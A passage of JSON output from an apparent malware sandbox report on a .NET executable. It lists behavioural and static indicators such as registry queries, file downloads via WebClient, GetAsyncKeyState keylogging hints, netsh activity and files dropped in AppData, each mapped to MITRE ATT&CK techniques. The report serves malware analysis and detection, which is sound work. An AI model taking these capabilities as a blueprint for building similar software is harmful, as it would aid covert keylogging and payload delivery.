IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-144", "relevance": 1, "name": "PE file contains COM data directory", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" has COM data directory \"IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-138", "relevance": 1, "name": "Dotnet code contains ability to query registry", "description": "Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"OpenSubKey\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValue\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetValueNames\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed namespace \"Microsoft.Win32.RegistryKey\" and TypeReference \"GetSubKeyNames\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-111", "relevance": 1, "name": "Contains ability to start a process (Dotnet)", "description": "Observed function \"Process.get_StartTime\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed function \"Process.Start\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-99", "relevance": 1, "name": "Contains ability to download files with network (Dotnet)", "description": "Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadData\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"\n Observed Namespace \"System.Net.WebClient\" and MemberReference \"DownloadFile\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-126", "relevance": 1, "name": "Dotnet source code contains suspicious native API", "description": "Observed API \"GetAsyncKeyState\" in \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\"", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"42418140452,6112,3142,,OpenMutexW,kernel32.dll,\"252:04:09.508\",RX=0,PX=0\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005756.00000001.67784.00050000.00000004.mdmp, 00000000-00005756.00000002.69706.00050000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"/Explorer.exe\" (Indicator: \"explorer.exe\"; File: \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"app\" - Location: [%APPDATA%\\app]- [targetUID: 00000000-00005756]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a\" was detected as \"Microsoft visual C# v7.0 / Basic .NET\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-2.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-appmodel-runtime-l1-1-0.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ole32.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\CRYPTSP.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\RpcRtRemote.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\shfolder.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\netsh.exe\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\ws2_32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" reads file \"c:\\windows\\microsoft.net\\framework\\v2.0.50727\\config\\machine.config\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-530", "type": 2, "relevance": 1, "name": "References PATH environment registry keys", "description": "Found string \"System\\CurrentControlSet\\Control\\Session Manager\\Environment\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"HKEY_CURRENT_USER\\Environment\\.\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"HKEY_CURRENT_USER\\Environment\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")\n Found string \"HKEY_CURRENT_USER\\Environment\\SEE_MASK_NOZONECHECKS\"; Source: \"00000000-00005756.00000001.67784.01E70000.00000004.mdmp, 00000000-00005756.00000002.69706.01E70000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1574.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/007"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe.Local\\\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\fusion.localgac\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Globalization\\en-us.nlp\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\app\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\System32\\MSCOREE.DLL.LOCAL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\BE71563BC45BED64A8291C3579BD4D5BE6ED97F0D64E91B29E37D16339F5B46A.EXE.CONFIG\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\BE71563BC45BED64A8291C3579BD4D5BE6ED97F0D64E91B29E37D16339F5B46A.EXE.LOCAL\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\FUSION.LOCALGAC\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG.CCH\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" trying to access non-existent file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG.CCH\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\app\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" writes file \"%appdata%\\app\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.0.3705\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v1.1.4322\\mscorwks.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\clr.dll\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config\"\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" touched file \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" queries basic process information of the \"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\77c1dc46ea139bf5e1eaa9b87ef03c7a\\System.Xml.ni.dll\" (UID: 5756)\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" queries basic process information of the \"C:\\Windows\\System32\\en-US\\KernelBase.dll.mui\" (UID: 5756)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"app\" has type \"Unicode text UTF-8 (with BOM) text with no line terminators\"- Location: [%APPDATA%\\app]- [targetUID: 00000000-00005756]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTNAME\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTBIAS\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DAYLIGHTSTART\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"TIMEZONEKEYNAME\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"DYNAMICDAYLIGHTTIMEDISABLED\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"ACTIVETIMEBIAS\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"DISPLAYNAME\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"CONFIGMASK\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"CONFIGSTRING\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"MVID\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"EVALATIONDATA\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"STATUS\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"ILDEPENDENCIES\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\FUSION\\NATIVEIMAGESINDEX\\V2.0.50727_32\\NI\\159A66B8\\424BD4D8\\F\"; Key: \"NIDEPENDENCIES\"; Value: \"\")\n \"be71563bc45bed64a8291c3579bd4d5be6ed97f0d64e91b29e37d16339f5b46a.exe\" (Access type: \"QUERYVAL\"; Path: 